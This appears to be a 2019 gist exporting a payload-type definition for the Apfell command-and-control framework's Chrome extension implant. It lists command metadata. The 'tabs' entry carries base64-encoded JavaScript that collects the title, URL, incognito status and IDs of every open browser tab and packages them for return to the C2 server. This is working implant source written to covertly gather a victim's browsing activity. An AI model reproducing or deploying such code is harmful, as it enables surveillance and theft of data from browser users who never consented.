@xorrior
Created February 4, 2019 15:07
Apfell payload-type export for the Chrome extension payload (commands are stored as base64-encoded JavaScript in the "file" fields)
{
"payload_types": [
{
"wrapper": false,
"command_template": "_command = function(){\n// Command code here\n}\n\nC2.commands[_command.name] = _command;",
"supported_os": "macOS (x86),macOS (x64),Windows (x86),Windows (x64)",
"execute_help": "",
"ptype": "chrome-extension",
"file_extension": ".js",
"wrapped_payload_type": "null",
"files": [
{
"chrome-extension.js": "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"
}
],
"c2_profiles": {},
"load_transforms": [],
"create_transforms": [],
"commands": [
{
"needs_admin": false,
"help_cmd": "screencapture",
"version": 2,
"description": "Capture a screenshot of the active tab",
"cmd": "screencapture",
"parameters": [],
"attack": [],
"artifacts": [],
"file": "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"
},
{
"needs_admin": false,
"help_cmd": "tabs",
"version": 2,
"description": "Dump title, URL, incognito flag, tab id, active/highlighted state and window id for every open tab",
"cmd": "tabs",
"parameters": [],
"attack": [],
"artifacts": [],
"file": "dGFicyA9IGZ1bmN0aW9uKHBhcmFtcykgewogICAgY29uc3QgcXVlcnlJbmZvID0ge307CiAgICBsZXQgdGFicyA9W107CiAgICBjaHJvbWUudGFicy5xdWVyeShxdWVyeUluZm8sIGZ1bmN0aW9uKHJlc3VsdCl7CiAgICAgICAgZm9yIChpID0gMDsgaSA8IHJlc3VsdC5sZW5ndGg7IGkrKykgewogICAgICAgICAgICBjb25zdCBpbmRpdmlkdWFsVGFiID0ge307CiAgICAgICAgICAgIGluZGl2aWR1YWxUYWIud2luZG93ID0gcmVzdWx0W2ldLnRpdGxlOwogICAgICAgICAgICBpbmRpdmlkdWFsVGFiLnVybCA9IHJlc3VsdFtpXS51cmw7CiAgICAgICAgICAgIGluZGl2aWR1YWxUYWIuaW5jb2duaXRvID0gcmVzdWx0W2ldLmluY29nbml0bzsKICAgICAgICAgICAgaW5kaXZpZHVhbFRhYi5pZCA9IHJlc3VsdFtpXS5pZDsKICAgICAgICAgICAgaW5kaXZpZHVhbFRhYi5hY3RpdmUgPSByZXN1bHRbaV0uYWN0aXZlOwogICAgICAgICAgICBpbmRpdmlkdWFsVGFiLmhpZ2hsaWdodGVkID0gcmVzdWx0W2ldLmhpZ2hsaWdodGVkOwogICAgICAgICAgICBpbmRpdmlkdWFsVGFiLndpbmRvd2lkID0gcmVzdWx0W2ldLndpbmRvd0lkOwoKICAgICAgICAgICAgdGFicy5wdXNoKGluZGl2aWR1YWxUYWIpOwogICAgICAgIH0KICAgICAgICBjb25zdCBkYXRhID0gYnRvYSh1bmVzY2FwZShlbmNvZGVVUklDb21wb25lbnQoSlNPTi5zdHJpbmdpZnkodGFicykpKSk7CiAgICAgICAgY29uc3QgYXBmZWxsTXNnID0gQ3JlYXRlQXBmZWxsTWVzc2FnZSgyLCBhcGZlbGwuYXBmZWxsSUQsIGFwZmVsbC5VVUlELCBkYXRhLmxlbmd0aCwgdGFza2lkLCB0YXNrdHlwZSwgZGF0YSk7CiAgICAgICAgbGV0IG1ldGEgPSB7fTsKICAgICAgICBtZXRhWyJtZXRhdHlwZSJdID0gMzsKICAgICAgICBtZXRhWyJtZXRhZGF0YSJdID0gYXBmZWxsTXNnOwogICAgICAgIGNvbnN0IG1ldGFlbnZlbG9wZSA9IEpTT04uc3RyaW5naWZ5KG1ldGEpOwogICAgICAgIG91dC5wdXNoKG1ldGFlbnZlbG9wZSk7CiAgICB9KTsKfTsKCkMyLmNvbW1hbmRzW3RhYnMubmFtZV0gPSB0YWJzOwpDT01NQU5EX0VORFNfSEVSRQo="
}
]
}
]
}